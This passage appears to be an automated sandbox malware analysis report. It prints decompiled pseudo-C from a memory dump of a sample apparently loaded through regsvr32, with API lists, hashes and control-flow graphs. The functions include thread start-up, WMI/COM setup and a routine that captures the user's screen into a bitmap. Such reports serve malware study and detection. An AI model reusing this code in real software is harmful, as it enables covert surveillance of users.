              				void* _t41;
              				void* _t48;
              				intOrPtr* _t49;
              
              				_push(__ecx);
              				if(_a8 != 1) {
              					__eflags = _a8;
              					if(_a8 != 0) {
              						L7:
              						__eflags = 1;
              						return 1;
              					}
              					_t15 =  *0x74f8d0; // 0xc2f8c0
              					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
              					L3:
              					return 0;
              				}
              				E00738DB4();
              				E00739787();
              				 *0x74f8e8 = _a4;
              				E00743D36(_a4);
              				 *_t49 = 0xf2e;
              				 *0x74f8d0 = E0073F0D9(0x74ca88, 0x138);
              				 *_t49 = 0xe8d;
              				_t23 = E00739F85(0x74ca88);
              				_pop(_t41);
              				_a8 = _t23;
              				_t24 = GetFileAttributesW(_t23); // executed
              				_push( &_a8);
              				if(_t24 == 0xffffffff) {
              					E00738D9A();
              					 *_t49 = 0x1f4;
              					_t28 = E0073FCDA(E0073109A(_t41));
              					_a8 = _t28;
              					__eflags = _t28;
              					if(_t28 != 0) {
              						_t48 = 0x54;
              						 *0x74f8e0 = E0073F0D9(0x74cbf0, _t48);
              						E0073647A(_t48, __eflags);
              						E00738DDF( &_a8, 0xfffffffe);
              						_t36 =  *0x74f8d0; // 0xc2f8c0
              						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x641);
              					}
              					_v8 = 0;
              					_t31 = CreateThread(0, 0, E007363A2, 0, 0,  &_v8);
              					 *0x74f8f4 = _t31;
              					__eflags = _t31;
              					if(_t31 == 0) {
              						goto L3;
              					} else {
              						goto L7;
              					}
              				}
              				E00738D9A();
              				goto L3;
              			}














              APIs
                • Part of subcall function 00738DB4: HeapCreate.KERNELBASE(00000000,00096000,00000000,00736616), ref: 00738DBD
                • Part of subcall function 0073F0D9: GetModuleHandleA.KERNEL32(00000000,?,?,?,0074CA88,?,0073663F,?), ref: 0073F0FB
              • GetFileAttributesW.KERNELBASE(00000000), ref: 00736655
              • CreateThread.KERNELBASE(00000000,00000000,007363A2,00000000,00000000,?), ref: 007366DC
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: Create$AttributesFileHandleHeapModuleThread
              • String ID:
              • API String ID: 607385197-0
              • Opcode ID: 1946454c65f1a8a661556a3ca84b93f3905dc241dd42eb8c21749afefd443693
              • Instruction ID: 1404fdbed5bf610297dbc2d2373ef6994f928fa35b4359a059c165cc7b41048d
              • Opcode Fuzzy Hash: 1946454c65f1a8a661556a3ca84b93f3905dc241dd42eb8c21749afefd443693
              • Instruction Fuzzy Hash: 8D212CB5604205EFEB44AFB5E80AA6E37E8AF05350F10C53AF559DA1D2DB7CC540CB25
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 352 73f0d9-73f0f9 call 739f6b 355 73f103-73f108 LoadLibraryA 352->355 356 73f0fb-73f101 GetModuleHandleA 352->356 357 73f10a-73f10c 355->357 356->357 358 73f11b-73f129 call 738d87 357->358 359 73f10e-73f113 call 73f08e 357->359 362 73f118-73f119 359->362 362->358
              C-Code - Quality: 47%
              			E0073F0D9(void* __ecx, void* __edx, intOrPtr _a4) {
              				char _v8;
              				char _t5;
              				struct HINSTANCE__* _t7;
              				void* _t10;
              				void* _t12;
              				void* _t22;
              				void* _t25;
              
              				_push(__ecx);
              				_t12 = __ecx;
              				_t22 = __edx;
              				_t5 = E00739F6B(_a4);
              				_t25 = 0;
              				_v8 = _t5;
              				_push(_t5);
              				if(_a4 != 0xf2e) {
              					_t7 = LoadLibraryA(); // executed
              				} else {
              					_t7 = GetModuleHandleA();
              				}
              				if(_t7 != 0) {
              					_t10 = E0073F08E(_t12, _t22, _t7); // executed
              					_t25 = _t10;
              				}
              				E00738D87( &_v8);
              				return _t25;
              			}











              APIs
              • GetModuleHandleA.KERNEL32(00000000,?,?,?,0074CA88,?,0073663F,?), ref: 0073F0FB
              • LoadLibraryA.KERNELBASE(00000000,?,?,?,0074CA88,?,0073663F,?), ref: 0073F108
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: HandleLibraryLoadModule
              • String ID:
              • API String ID: 4133054770-0
              • Opcode ID: 45f7be4acef65fc1383fa538a028872a8117c9c7c309775a28355bafc95392dc
              • Instruction ID: 65536149b101ceaceb0c42b13867707c190eb2db63ebba7e9eeff2886fd1aa1f
              • Opcode Fuzzy Hash: 45f7be4acef65fc1383fa538a028872a8117c9c7c309775a28355bafc95392dc
              • Instruction Fuzzy Hash: 26F0A731700219EBE714ABADEC4545AB3EDDF583D1F20413AF102D7252DEB88D408791
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 364 7363a2-7363bb call 73651e GetOEMCP call 73dfc2 369 7363c0-7363eb call 743c36 364->369 370 7363bd-7363be 364->370 374 7363f5-7363fb call 73d889 369->374 375 7363ed-7363f3 369->375 371 736435 370->371 378 736400-736407 374->378 376 73640f-73641b 375->376 379 73642d call 733597 376->379 380 73641d-736422 call 7361e8 376->380 381 736424-73642b 378->381 382 736409 378->382 385 736432-736434 379->385 380->385 381->379 381->385 382->376 385->371
              C-Code - Quality: 100%
              			E007363A2(void* __fp0) {
              				void* __ecx;
              				intOrPtr _t13;
              				intOrPtr _t14;
              				signed int _t16;
              				intOrPtr _t17;
              				intOrPtr _t20;
              				void* _t25;
              				void* _t27;
              
              				_t32 = __fp0;
              				E0073651E();
              				GetOEMCP();
              				_t13 = E0073DFC2(__fp0); // executed
              				 *0x74f8d4 = _t13;
              				if(_t13 != 0) {
              					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
              					_t14 =  *0x74f8d4; // 0xc2fc00
              					_t2 = _t14 + 0x224; // 0x730000
              					E00743C36( *_t2);
              					_t26 =  *0x74f8d4; // 0xc2fc00
              					_t25 = _t27;
              					__eflags =  *(_t26 + 0x1898) & 0x00010000;
              					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
              						_t7 = _t26 + 0x224; // 0x730000, executed
              						_t26 =  *_t7;
              						_t16 = E0073D889( *_t7); // executed
              						__eflags = _t16;
              						_t17 =  *0x74f8d4; // 0xc2fc00
              						if(_t16 != 0) {
              							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
              							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
              								L10:
              								__eflags = 0;
              								return 0;
              							}
              							L9:
              							E00733597();
              							goto L10;
              						}
              						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
              						L6:
              						_t20 =  *0x74f8d4; // 0xc2fc00
              						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
              						if(__eflags == 0) {
              							goto L9;
              						}
              						E007361E8(_t25, _t26, __eflags, _t32);
              						goto L10;
              					}
              					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
              					goto L6;
              				}
              				return _t13 + 1;
              			}












              APIs
              • GetOEMCP.KERNEL32 ref: 007363A7
                • Part of subcall function 0073DFC2: GetCurrentProcessId.KERNEL32 ref: 0073DFE9
                • Part of subcall function 0073DFC2: GetLastError.KERNEL32 ref: 0073E0E3
                • Part of subcall function 0073DFC2: GetSystemMetrics.USER32(00001000), ref: 0073E0F3
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: CurrentErrorLastMetricsProcessSystem
              • String ID:
              • API String ID: 1196160345-0
              • Opcode ID: c8206843b3441b57c091d3f0a9e6461e1955d0be02e05c194f19bf0ba950e40b
              • Instruction ID: 246ea7b160c85cad3e0008b22786ebdffcf5a60313f6305f4d7f738fe58a5629
              • Opcode Fuzzy Hash: c8206843b3441b57c091d3f0a9e6461e1955d0be02e05c194f19bf0ba950e40b
              • Instruction Fuzzy Hash: 54018B79500292EFE614EF64E90DAA673E8EF16300F288177F0448A023C73C8950CBA5
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E0073CA0A(void* __ecx) {
              				signed int _v8;
              				intOrPtr _t12;
              				void* _t13;
              				void* _t14;
              				void* _t17;
              				intOrPtr _t18;
              				void* _t23;
              
              				_v8 = _v8 & 0x00000000;
              				_t12 =  *0x74f8d8; // 0xc2fab0
              				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
              				if(_t13 != 0) {
              					_t14 = E0073C9F3(); // executed
              					_t23 = _t14;
              					if(_t23 != 0) {
              						FindCloseChangeNotification(_v8);
              						_t17 = _t23;
              					} else {
              						if(_v8 != _t14) {
              							_t18 =  *0x74f8d0; // 0xc2f8c0
              							 *((intOrPtr*)(_t18 + 0x30))(_v8);
              						}
              						_t17 = 0;
              					}
              					return _t17;
              				} else {
              					return _t13;
              				}
              			}











              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a961cca549cddf2603edc26bc05009abcadd26cfda0575345573aa8a11428835
              • Instruction ID: 27d3329886ba039a0dee3ed1bb9ec642f28337d9ee4be12d7438299e0cd88946
              • Opcode Fuzzy Hash: a961cca549cddf2603edc26bc05009abcadd26cfda0575345573aa8a11428835
              • Instruction Fuzzy Hash: 25F03A31A10118EFDB12DBA8D946A9D73FCBF08346F1180A5E501FB262D778DE00DB94
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00736438() {
              				intOrPtr _t3;
              
              				_t3 =  *0x74f8d0; // 0xc2f8c0
              				 *((intOrPtr*)(_t3 + 0x2c))( *0x74f8f4, 0xffffffff);
              				ExitProcess(0);
              			}




              0x00736438
              0x00736445
              0x0073644f

              APIs
              • ExitProcess.KERNEL32(00000000), ref: 0073644F
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: ExitProcess
              • String ID:
              • API String ID: 621844428-0
              • Opcode ID: a4db31c54aed54b33e56cc00cbbcf5b3ad61b9e701da953f199fefa6da152364
              • Instruction ID: a21e9d5d741556ee918de6478ea098e85f639a84f36062e5f7688e7389b6b0a4
              • Opcode Fuzzy Hash: a4db31c54aed54b33e56cc00cbbcf5b3ad61b9e701da953f199fefa6da152364
              • Instruction Fuzzy Hash: 1BC002792141519FC740AB64ED49F1537E4BF0A322F19C6B7F5299E1F9CB2494009B14
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00738DC9(long _a4) {
              				void* _t2;
              
              				_t2 = RtlAllocateHeap( *0x74f9b8, 8, _a4); // executed
              				return _t2;
              			}




              0x00738dd7
              0x00738dde

              APIs
              • RtlAllocateHeap.NTDLL(00000008,?,?,00739793,00000100,?,0073661B), ref: 00738DD7
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: acc287bc95d9ca6d664ae8adac2de038d37ff203cf9691d131cbfcfdef7dbd86
              • Instruction ID: f0f252281fc8fe0bab47b77c2e89734e94f2e40aee8f4cd5f375bc911d69df19
              • Opcode Fuzzy Hash: acc287bc95d9ca6d664ae8adac2de038d37ff203cf9691d131cbfcfdef7dbd86
              • Instruction Fuzzy Hash: 6FB0923E080208BBCF411B81EC05A953F29FB1A651F008022F708484708B7764619B98
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 58%
              			E0073DADC(void* __ecx) {
              				signed int _t4;
              
              				_t4 = ResumeThread( *(__ecx + 4));
              				asm("sbb eax, eax");
              				return  ~_t4 & 0x00000001;
              			}




              0x0073dae4
              0x0073daec
              0x0073daf1

              APIs
              • ResumeThread.KERNELBASE(?,0073D947,?,?,00000001), ref: 0073DAE4
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: ResumeThread
              • String ID:
              • API String ID: 947044025-0
              • Opcode ID: 10fba95a2ac8746f532442722e628e6a35cff4e1c82fd445a932fac5252c7b4e
              • Instruction ID: 095c46f27a06a7fe0927ac2489c8d4e8d41604159d3cd84f3f2aaa85676bf0fe
              • Opcode Fuzzy Hash: 10fba95a2ac8746f532442722e628e6a35cff4e1c82fd445a932fac5252c7b4e
              • Instruction Fuzzy Hash: 19B092362A00019BCB005B74EC0A9A03BE0BB56606B98C2F5E015CA061C32EC4458B40
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00738DB4() {
              				void* _t1;
              
              				_t1 = HeapCreate(0, 0x96000, 0); // executed
              				 *0x74f9b8 = _t1;
              				return _t1;
              			}




              0x00738dbd
              0x00738dc3
              0x00738dc8

              APIs
              • HeapCreate.KERNELBASE(00000000,00096000,00000000,00736616), ref: 00738DBD
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: CreateHeap
              • String ID:
              • API String ID: 10892065-0
              • Opcode ID: 45b16f8d64264b54701b5bfcc97d151e797b41d2f8f1c06269ff9f07c657f533
              • Instruction ID: f6e797358e0df3beb72a58be153096fffe1c5d1f9dd5804ff702f0d114e875a8
              • Opcode Fuzzy Hash: 45b16f8d64264b54701b5bfcc97d151e797b41d2f8f1c06269ff9f07c657f533
              • Instruction Fuzzy Hash: 8AB012B8685300A6DB500B205C46B0135106346B02F208013F709981E0C7B42000951C
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 91%
              			E0073DAF2(void* __ecx, intOrPtr _a4, signed int _a8) {
              				signed int _v8;
              				intOrPtr _v12;
              				signed int _t26;
              				signed int _t28;
              				signed int* _t36;
              				signed int* _t39;
              
              				_push(__ecx);
              				_push(__ecx);
              				_t36 = _a8;
              				_t28 = _t36[1];
              				if(_t28 != 0) {
              					_t39 = _t36[2];
              					do {
              						_a8 = _a8 & 0x00000000;
              						if(_t39[2] > 0) {
              							_t31 = _t39[3];
              							_t22 = _a4 + 0x24;
              							_v12 = _a4 + 0x24;
              							_v8 = _t39[3];
              							while(E0073A236(_t22,  *_t31) != 0) {
              								_t26 = _a8 + 1;
              								_t31 = _v8 + 4;
              								_a8 = _t26;
              								_t22 = _v12;
              								_v8 = _v8 + 4;
              								if(_t26 < _t39[2]) {
              									continue;
              								} else {
              								}
              								goto L8;
              							}
              							 *_t36 =  *_t36 |  *_t39;
              						}
              						L8:
              						_t39 =  &(_t39[4]);
              						_t28 = _t28 - 1;
              					} while (_t28 != 0);
              				}
              				Sleep(0xa);
              				return 1;
              			}










              APIs
              • Sleep.KERNELBASE(0000000A), ref: 0073DB5B
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              • Opcode ID: a8dc0a3c30c85f40d1c78151e2f2a4f3b0cb5d039aea77e56e997d71d4b0cfd5
              • Instruction ID: 2f64813fc8003bc9f0624a88409fd9a8eb41cd5accedd091f484d6e0406b638a
              • Opcode Fuzzy Hash: a8dc0a3c30c85f40d1c78151e2f2a4f3b0cb5d039aea77e56e997d71d4b0cfd5
              • Instruction Fuzzy Hash: 03111BB1A00205AFEB24CFA9D485A99F7F8FF45324F11846AE95A9B341D378ED41CB50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 98%
              			E00735D1E(int* __ecx) {
              				signed int _v8;
              				char _v12;
              				int _v16;
              				struct HWND__* _v20;
              				struct HWND__* _v24;
              				struct HDC__* _v28;
              				void* _v32;
              				int* _v36;
              				void* _v40;
              				void* _v44;
              				void* _v48;
              				void* _v52;
              				void* _v56;
              				intOrPtr _v60;
              				intOrPtr _v64;
              				intOrPtr _v68;
              				intOrPtr _v72;
              				intOrPtr _v76;
              				intOrPtr _v80;
              				short _v82;
              				short _v84;
              				signed int _v88;
              				signed int _v92;
              				struct tagBITMAPINFO _v96;
              				intOrPtr _v102;
              				int _v110;
              				char _v112;
              				void* _v116;
              				void* _v120;
              				void* _v124;
              				void* _v132;
              				void* _v136;
              				void* _v140;
              				int _v156;
              				signed int _v160;
              				void _v164;
              				int _t82;
              				void* _t84;
              				signed int _t92;
              				void* _t99;
              				char _t103;
              				intOrPtr _t113;
              				int* _t114;
              				struct HDC__* _t120;
              				signed int _t124;
              				short _t137;
              				struct HDC__* _t141;
              				void* _t144;
              				void* _t148;
              
              				_v36 = __ecx;
              				_v24 = 0;
              				_t120 = 0;
              				_v12 = 0;
              				_t144 = 0;
              				_v20 = 0;
              				_t141 = GetDC(0);
              				_v28 = _t141;
              				if(_t141 != 0) {
              					_t120 = CreateCompatibleDC(_t141);
              					if(_t120 != 0) {
              						_v8 = GetDeviceCaps(_t141, 8);
              						_t82 = GetDeviceCaps(_t141, 0xa);
              						_v16 = _t82;
              						_t144 = CreateCompatibleBitmap(_t141, _v8, _t82);
              						if(_t144 != 0) {
              							_t84 = SelectObject(_t120, _t144);
              							_v32 = _t84;
              							if(_t84 != 0) {
              								_t144 = SelectObject(_t120, _v32);
              								if(_t144 != 0) {
              									GetObjectW(_t144, 0x18,  &_v164);
              									_t92 = _v160;
              									_t124 = _v156;
              									_v92 = _t92;
              									_v84 = 1;
              									_t137 = 0x20;
              									_v82 = _t137;
              									_v96.bmiHeader = 0x28;
              									_v80 = 0;
              									_v76 = 0;
              									_v72 = 0;
              									_v68 = 0;
              									_v64 = 0;
              									_v60 = 0;
              									asm("cdq");
              									_v88 = _t124;
              									_v8 = ((_t92 << 5) + 0x1f >> 5) * _t124 << 2;
              									_t99 = E00738DC9(((_t92 << 5) + 0x1f >> 5) * _t124 << 2);
              									_v20 = _t99;
              									if(_t99 != 0) {
              										GetDIBits(_t120, _t144, 0, _v156, _t99,  &_v96, 0);
              										_v16 = _v8 + 0x36;
              										_t103 = E00738DC9(_v8 + 0x36);
              										_v12 = _t103;
              										if(_t103 != 0) {
              											_v110 = _v16;
              											_v112 = 0x4d42;
              											_v102 = 0x36;
              											E00738EA6(_t103,  &_v112, 0xe);
              											E00738EA6(_v12 + 0xe,  &_v96, 0x28);
              											E00738EA6(_v12 + 0x36, _v20, _v8);
              											_t148 = _t148 + 0x24;
              											_v8 = _v8 & 0x00000000;
              											_t113 = E0073FBFB(_v12, _v16,  &_v8);
              											_v24 = _t113;
              											if(_t113 != 0) {
              												_t114 = _v36;
              												if(_t114 != 0) {
              													 *_t114 = _v8;
              												}
              											}
              										}
              									}
              								}
              							}
              						}
              					}
              				}
              				E00738DDF( &_v20, 0);
              				E00738DDF( &_v12, 0);
              				if(_t120 != 0) {
              					DeleteDC(_t120);
              				}
              				if(_t141 != 0) {
              					DeleteDC(_t141);
              				}
              				if(_t144 != 0) {
              					DeleteObject(_t144);
              				}
              				return _v24;
              			}

              APIs
              • GetDC.USER32(00000000), ref: 00735D3D
              • CreateCompatibleDC.GDI32(00000000), ref: 00735D51
              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00735D6A
              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00735D72
              • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 00735D7C
              • SelectObject.GDI32(00000000,00000000), ref: 00735D8E
              • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00735DB2
              • GetCursorInfo.USER32(?), ref: 00735DC3
              • CopyIcon.USER32 ref: 00735DD8
              • GetIconInfo.USER32(00000000,?), ref: 00735DE6
              • GetObjectW.GDI32(?,00000018,?), ref: 00735E04
              • DrawIconEx.USER32 ref: 00735E1C
              • SelectObject.GDI32(00000000,?), ref: 00735E29
              • GetObjectW.GDI32(00000000,00000018,?), ref: 00735E43
              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000028,00000000), ref: 00735EBF
              • DeleteDC.GDI32(00000000), ref: 00735F70
              • DeleteDC.GDI32(00000000), ref: 00735F7B
              • DeleteObject.GDI32(00000000), ref: 00735F86
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: Object$DeleteIcon$CapsCompatibleCreateDeviceInfoSelect$BitmapBitsCopyCursorDraw
              • String ID: ($6
              • API String ID: 192358524-4149066357
              • Opcode ID: b59aa6dd91bb49ad19638e8082cf0ff8bcb470d2e1b0c6895b15a3f936f5dbb0
              • Instruction ID: 06ddfb175d9195c9644027eb0c6ddf2a1ac1b67061b7b249c04a88702f2fded6
              • Opcode Fuzzy Hash: b59aa6dd91bb49ad19638e8082cf0ff8bcb470d2e1b0c6895b15a3f936f5dbb0
              • Instruction Fuzzy Hash: 84812FB5D0061AEBEB10DFA4DC49B9EBBB8EF49300F108069F605F7251EB389A05CB54
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 30%
              			E0073E485(void* __ecx) {
              				char _v8;
              				void* _v12;
              				char* _t15;
              				intOrPtr* _t16;
              				void* _t21;
              				intOrPtr* _t23;
              				intOrPtr* _t24;
              				intOrPtr* _t25;
              				void* _t30;
              				void* _t33;
              
              				_v12 = 0;
              				_v8 = 0;
              				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
              				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
              				_t15 =  &_v12;
              				__imp__CoCreateInstance(0x74c8a0, 0, 1, 0x74c8b0, _t15);
              				if(_t15 < 0) {
              					L5:
              					_t23 = _v8;
              					if(_t23 != 0) {
              						 *((intOrPtr*)( *_t23 + 8))(_t23);
              					}
              					_t24 = _v12;
              					if(_t24 != 0) {
              						 *((intOrPtr*)( *_t24 + 8))(_t24);
              					}
              					_t16 = 0;
              				} else {
              					__imp__#2(__ecx);
              					_t25 = _v12;
              					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
              					if(_t21 < 0) {
              						goto L5;
              					} else {
              						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
              						if(_t21 < 0) {
              							goto L5;
              						} else {
              							_t16 = E00738DC9(8);
              							if(_t16 == 0) {
              								goto L5;
              							} else {
              								 *((intOrPtr*)(_t16 + 4)) = _v12;
              								 *_t16 = _v8;
              							}
              						}
              					}
              				}
              				return _t16;
              			}

              APIs
              • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0073E7B4,00000E16,00000000,00000000,00000005), ref: 0073E498
              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0073E7B4,00000E16,00000000,00000000,00000005), ref: 0073E4A9
              • CoCreateInstance.OLE32(0074C8A0,00000000,00000001,0074C8B0,00000000,?,0073E7B4,00000E16,00000000,00000000,00000005), ref: 0073E4C0
              • SysAllocString.OLEAUT32(00000000), ref: 0073E4CB
              • CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0073E7B4,00000E16,00000000,00000000,00000005), ref: 0073E4F6
                • Part of subcall function 00738DC9: RtlAllocateHeap.NTDLL(00000008,?,?,00739793,00000100,?,0073661B), ref: 00738DD7
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
              • String ID:
              • API String ID: 1610782348-0
              • Opcode ID: dc050bec8f1de2e09a70e677ea405252ec8aac25c0a45da643b2ec6b8efdeec8
              • Instruction ID: 84974916a1e43ebf9ec58cec22485c4e694ffba0cc9be26682b9744f895d7582
              • Opcode Fuzzy Hash: dc050bec8f1de2e09a70e677ea405252ec8aac25c0a45da643b2ec6b8efdeec8
              • Instruction Fuzzy Hash: B9212C74600245BBEB248B62DC4DE6FBF7CEFC7B14F10415DB506A6291D7759A00DA70
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E0073DDE7(void* __ecx) {
              				struct _SYSTEM_INFO _v40;
              				void* _t5;
              
              				if(__ecx == 0) {
              					GetSystemInfo( &_v40);
              					return _v40.dwOemId & 0x0000ffff;
              				} else {
              					_t5 = 9;
              					return _t5;
              				}
              			}

              APIs
              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,0073E1C0), ref: 0073DDFA
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: InfoSystem
              • String ID:
              • API String ID: 31276548-0
              • Opcode ID: 2fc23202c023d21f59c5a5dac5b7984f9037f06fd2f98a053371787a4d509953
              • Instruction ID: 0dab313779cbaad638e56f8c2236dda9cda17334645a0443fb549c86c901c57e
              • Opcode Fuzzy Hash: 2fc23202c023d21f59c5a5dac5b7984f9037f06fd2f98a053371787a4d509953
              • Instruction Fuzzy Hash: B6C01265A0120B56DF149BA5B9166EB73FC5B44649F100456EE02F20D1EB64DD414260
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 50%
              			E0073EACA(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
              				signed int _v12;
              				signed int _v16;
              				signed int _v20;
              				char _v24;
              				void* _v28;
              				signed int _v32;
              				char _v36;
              				intOrPtr _v40;
              				signed int _v44;
              				char _v48;
              				char _v52;
              				intOrPtr _v56;
              				signed int _v60;
              				char* _v72;
              				signed short _v80;
              				signed int _v84;
              				char _v88;
              				char _v92;
              				char _v96;
              				intOrPtr _v100;
              				char _v104;
              				char _v616;
              				intOrPtr* _t159;
              				char _t165;
              				signed int _t166;
              				signed int _t173;
              				signed int _t178;
              				signed int _t186;
              				intOrPtr* _t187;
              				signed int _t188;
              				signed int _t192;
              				intOrPtr* _t193;
              				intOrPtr _t200;
              				intOrPtr* _t205;
              				signed int _t207;
              				signed int _t209;
              				intOrPtr* _t210;
              				intOrPtr _t212;
              				intOrPtr* _t213;
              				signed int _t214;
              				char _t217;
              				signed int _t218;
              				signed int _t219;
              				signed int _t230;
              				signed int _t235;
              				signed int _t242;
              				signed int _t243;
              				signed int _t244;
              				signed int _t245;
              				intOrPtr* _t247;
              				intOrPtr* _t251;
              				signed int _t252;
              				intOrPtr* _t253;
              				void* _t255;
              				intOrPtr* _t261;
              				signed int _t262;
              				signed int _t283;
              				signed int _t289;
              				char* _t298;
              				void* _t320;
              				signed int _t322;
              				intOrPtr* _t323;
              				intOrPtr _t324;
              				signed int _t327;
              				intOrPtr* _t328;
              				intOrPtr* _t329;
              
              				_v32 = _v32 & 0x00000000;
              				_v60 = _v60 & 0x00000000;
              				_v56 = __edx;
              				_v100 = __ecx;
              				_t159 = E0073E485(__ecx);
              				_t251 = _t159;
              				_v104 = _t251;
              				if(_t251 == 0) {
              					return _t159;
              				}
              				_t320 = E00738DC9(0x10);
              				_v36 = _t320;
              				_pop(_t255);
              				if(_t320 == 0) {
              					L53:
              					E00738DDF( &_v60, 0xfffffffe);
              					E0073E539( &_v104);
              					return _t320;
              				}
              				_t165 = E00739F85(_t255, 0xcdd);
              				 *_t328 = 0x6b4;
              				_v52 = _t165;
              				_t166 = E00739F85(_t255);
              				_push(0);
              				_push(_v56);
              				_v20 = _t166;
              				_push(_t166);
              				_push(_a4);
              				_t322 = E00739C50(_t165);
              				_v60 = _t322;
              				E00738D9A( &_v52);
              				E00738D9A( &_v20);
              				_t329 = _t328 + 0x20;
              				if(_t322 != 0) {
              					_t323 = __imp__#2;
              					_v40 =  *_t323(_t322);
              					_t173 = E00739F85(_t255, 0xc93);
              					_v20 = _t173;
              					_v52 =  *_t323(_t173);
              					E00738D9A( &_v20);
              					_t324 = _v40;
              					_t261 =  *_t251;
              					_t252 = 0;
